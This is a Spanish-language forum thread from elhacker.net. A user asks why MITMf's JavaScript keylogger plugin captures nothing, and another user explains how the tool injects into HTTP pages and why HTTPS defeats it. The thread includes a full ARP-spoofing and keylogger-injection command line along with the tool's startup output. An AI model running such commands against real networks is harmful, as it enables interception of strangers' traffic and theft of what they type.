Foro de elhacker.net

Comunicaciones => Redes => Mensaje iniciado por: N3LD4Z en 6 Mayo 2017, 01:51 am


Título: Ayuda con keylogger MITMF (no captura datos)
Publicado por: N3LD4Z en 6 Mayo 2017, 01:51 am
Hola gente como estan ? Ando leyendo un manual de tcp/icp y practicando todo lo relacionado a redes cuando tengo tiempo libre como para agilizar la mente y entender como funcionan los protocolos,servicios,etc. Vengo bastante bien entendiendo todo, y aunque ahora publique esto, en paralelo estoy buscando la solucion en san GOOGLE.

Mi problema es con MITMF y el plugin de keylogger, mis pasos son los siguientes:

1. Ejecutar route -n para ver mi gateway predeterminado (o if config xd)
2. netdiscover y ver el ip objetivo (en mi caso, mi propia ip de kali linux) 192.168.0.21
3. Ejecutar mitmf con los siguientes parametros:
Código:
mitmf --spoof --arp -i wlan0 --gateway 192.168.0.1 --target 192.168.0.20 --jskeylogger

4. Esperar a que el keylogger capture datos infinitamente porque jamas sucede nada:
Código:
[*] MITMf v0.9.8 - 'The Dark Side'
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ JSKeylogger v0.2
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

Tengo 2 o 3 dudas que estoy intentando aclarar con google y son las siguientes:
1. Puedo capturar trafico con el keylogger de un iphone? siendo que este use las aplicaciones whatsapp,facebook, instagram.. (YA ENTENDI QUE NO PORQUE ES UN KEYLOGGER WEB)
2. Mitmf y este plugin no necesitan que configure iptables y active (1) el archivo /proc/sys/net/ipv4/ip_forward

No hace falta que me pongan la solucion, pero si tienen ganas de orientarme seria genial, Mientras tanto estoy buscando como funciona mitmf y leyendome su manual (mitmf -h), tambien ando leyendo sobre iptables (muy interesante). Hasta ahora me quiero profundizar en lo que es redes lo más posible. Tengo que ponerme con scapy haber si lo entiendo mejor..

Desde ya gracias por su tiempo y saludos !

Título: Re: Ayuda con keylogger MITMF (no captura datos)
Publicado por: engel lex en 6 Mayo 2017, 04:36 am
primero que nada, sabes lo que hace mtimf y en especial el plugin jskeylogger?

Título: Re: Ayuda con keylogger MITMF (no captura datos)
Publicado por: N3LD4Z en 6 Mayo 2017, 14:40 pm
Hola engel ! No se bien como funciona porque sino no estaria preguntando (que no suene ofensivo pero es verdad xd) Por eso aclare en el post que estaba buscando algun manual o tratar de entender por mi cuenta como funciona leyendo el manual o help de mitmf.. y lo estoy buscando todavia para no tener que hacer preguntas como en este tema

Título: Re: Ayuda con keylogger MITMF (no captura datos)
Publicado por: engel lex en 6 Mayo 2017, 16:18 pm
https://github.com/byt3bl33d3r/MITMf (https://github.com/byt3bl33d3r/MITMf)

su misma documentación dice que hace.... lo que hace por resumir, es tomar los paquetes http interceptados alterar el html y reenviar. esto no actuará sobre ningún https (por obvias razones)

Citar
Mitmf y este plugin no necesitan que configure iptables y active (1) el archivo /proc/sys/net/ipv4/ip_forward
el mismo debería hacer esto, pero si debes necesitar el segundo

el jskeylogger por ser en jscript, no será para todo el pc, solo capturará lo escrito dentro de la pagina donde se cargó

Título: Re: Ayuda con keylogger MITMF (no captura datos)
Publicado por: N3LD4Z en 6 Mayo 2017, 18:23 pm
Mil gracias engel.. creo que entendi, y si entendi mal igualmente todavia estoy leyendo y haciendo apuntes sobre protocolo tcp/ip y tratando de entender redes.. creo que voy a seguir intentando hasta que pueda hacerlo funcionar asi sabre que lo entendi.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines